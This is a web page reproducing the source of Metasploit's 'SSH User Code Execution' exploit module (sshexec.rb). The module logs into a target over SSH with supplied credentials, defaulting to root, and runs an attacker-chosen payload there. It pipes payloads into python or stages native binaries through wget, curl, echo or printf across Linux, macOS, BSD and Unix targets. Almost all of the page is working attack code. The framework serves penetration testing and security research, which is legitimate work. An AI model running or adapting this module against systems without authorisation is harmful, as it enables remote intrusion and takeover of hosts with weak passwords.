Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/ssh/sshexec.rb
28472 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::SSH

11


12
  attr_accessor :ssh_socket

13


14
  def initialize

15
    super(

16
      'Name' => 'SSH User Code Execution',

17
      'Description' => %q(

18
        This module connects to the target system and executes the necessary

19
        commands to run the specified payload via SSH. If a native payload is

20
        specified, an appropriate stager will be used.

21
      ),

22
      'Author' => ['Spencer McIntyre', 'Brandon Knight'],

23
      'References' => [

24
        [ 'CVE', '1999-0502'], # Weak password

25
        [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]

26
      ],

27
      'License' => MSF_LICENSE,

28
      'Privileged' => true,

29
      'DefaultOptions' => {

30
        'PrependFork' => 'true',

31
        'EXITFUNC' => 'process'

32
      },

33
      'Payload' => {

34
        'Space' => 800000,

35
        'BadChars' => "",

36
        'DisableNops' => true

37
      },

38
      'Platform' => %w[linux osx unix python bsd],

39
      'CmdStagerFlavor' => %w[bourne echo printf wget],

40
      'Targets' => [

41
        [

42
          'Linux Command',

43
          {

44
            'Arch' => ARCH_CMD,

45
            'Platform' => 'linux'

46
          }

47
        ],

48
        [

49
          'Linux x86',

50
          {

51
            'Arch' => ARCH_X86,

52
            'Platform' => 'linux'

53
          }

54
        ],

55
        [

56
          'Linux x64',

57
          {

58
            'Arch' => ARCH_X64,

59
            'Platform' => 'linux'

60
          }

61
        ],

62
        [

63
          'Linux armle',

64
          {

65
            'Arch' => ARCH_ARMLE,

66
            'Platform' => 'linux'

67
          }

68
        ],

69
        [

70
          'Linux mipsle',

71
          {

72
            'Arch' => ARCH_MIPSLE,

73
            'Platform' => 'linux',

74
            'CmdStagerFlavor' => %w[curl wget]

75
          }

76
        ],

77
        [

78
          'Linux mipsbe',

79
          {

80
            'Arch' => ARCH_MIPSBE,

81
            'Platform' => 'linux',

82
            'CmdStagerFlavor' => %w[wget]

83
          }

84
        ],

85
        [

86
          'Linux aarch64',

87
          {

88
            'Arch' => ARCH_AARCH64,

89
            'Platform' => 'linux'

90
          }

91
        ],

92
        [

93
          'OSX x86',

94
          {

95
            'Arch' => ARCH_X86,

96
            'Platform' => 'osx',

97
            'CmdStagerFlavor' => %w[curl wget]

98
          }

99
        ],

100
        [

101
          'OSX x64',

102
          {

103
            'Arch' => ARCH_X64,

104
            'Platform' => 'osx',

105
            'CmdStagerFlavor' => %w[curl wget]

106
          }

107
        ],

108
        [

109
          'BSD x86',

110
          {

111
            'Arch' => ARCH_X86,

112
            'Platform' => 'bsd',

113
            'CmdStagerFlavor' => %w[printf curl wget]

114
          }

115
        ],

116
        [

117
          'BSD x64',

118
          {

119
            'Arch' => ARCH_X64,

120
            'Platform' => 'bsd',

121
            'CmdStagerFlavor' => %w[printf curl wget]

122
          }

123
        ],

124
        [

125
          'Python',

126
          {

127
            'Arch' => ARCH_PYTHON,

128
            'Platform' => 'python'

129
          }

130
        ],

131
        [

132
          'Unix Cmd',

133
          {

134
            'Arch' => ARCH_CMD,

135
            'Platform' => 'unix'

136
          }

137
        ],

138
        [

139
          'Interactive SSH',

140
          {

141
            'DefaultOptions' => {

142
              'PAYLOAD' => 'generic/ssh/interact',

143
              'WfsDelay' => 5

144
            },

145
            'Payload' => {

146
              'Compat' => {

147
                'PayloadType' => 'ssh_interact',

148
              }

149
            }

150
          }

151
        ]

152
      ],

153
      'DefaultTarget' => 0,

154
      # For the CVE

155
      'DisclosureDate' => 'Jan 01 1999',

156
      'Notes' => {

157
        'Stability' => [ CRASH_SAFE, ],

158
        'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],

159
        'Reliability' => [ REPEATABLE_SESSION, ],

160
      },

161
    )

162


163
    register_options(

164
      [

165
        OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),

166
        OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),

167
        Opt::RHOST(),

168
        Opt::RPORT(22)

169
      ]

170
    )

171


172
    register_advanced_options(

173
      [

174
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])

175
      ]

176
    )

177
  end

178


179
  def execute_command(cmd, opts = {})

180
    vprint_status("Executing #{cmd}")

181
    begin

182
      Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }

183
    rescue Timeout::Error

184
      print_warning('Timed out while waiting for command to return')

185
      @timeout = true

186
    end

187
  end

188


189
  def do_login(ip, user, pass, port)

190
    opt_hash = ssh_client_defaults.merge({

191
      auth_methods: ['password', 'keyboard-interactive'],

192
      port: port,

193
      password: pass

194
    })

195


196
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

197


198
    begin

199
      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)

200
    rescue Rex::ConnectionError

201
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')

202
    rescue Net::SSH::Disconnect, ::EOFError

203
      fail_with(Failure::Disconnected, 'Timed out during negotiation')

204
    rescue Net::SSH::AuthenticationFailed

205
      fail_with(Failure::NoAccess, 'Failed authentication')

206
    rescue Net::SSH::Exception => e

207
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")

208
    end

209


210
    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket

211
  end

212


213
  def binary_exists(binary, platform: nil)

214
    Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))

215
  end

216


217
  def execute_python

218
    python_binary = binary_exists('python', platform: 'unix')

219
    python_binary ||= binary_exists('python3', platform: 'unix')

220
    python_binary ||= binary_exists('python2', platform: 'unix')

221
    fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?

222


223
    execute_command("echo \"#{payload.encoded}\" | #{python_binary}")

224
  end

225


226
  def exploit

227
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

228


229
    if target.name == 'Interactive SSH'

230
      handler(ssh_socket)

231
      return

232
    end

233


234
    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")

235


236
    case target['Platform']

237
    when 'python'

238
      execute_python

239
    when 'unix'

240
      execute_command(payload.encoded)

241
    else

242
      if target['Arch'] == ARCH_CMD

243
        execute_command(payload.encoded)

244
      else

245
        execute_cmdstager(linemax: 500)

246
      end

247
    end

248


249
    @timeout ? ssh_socket.shutdown! : ssh_socket.close

250
  end

251
end

252


253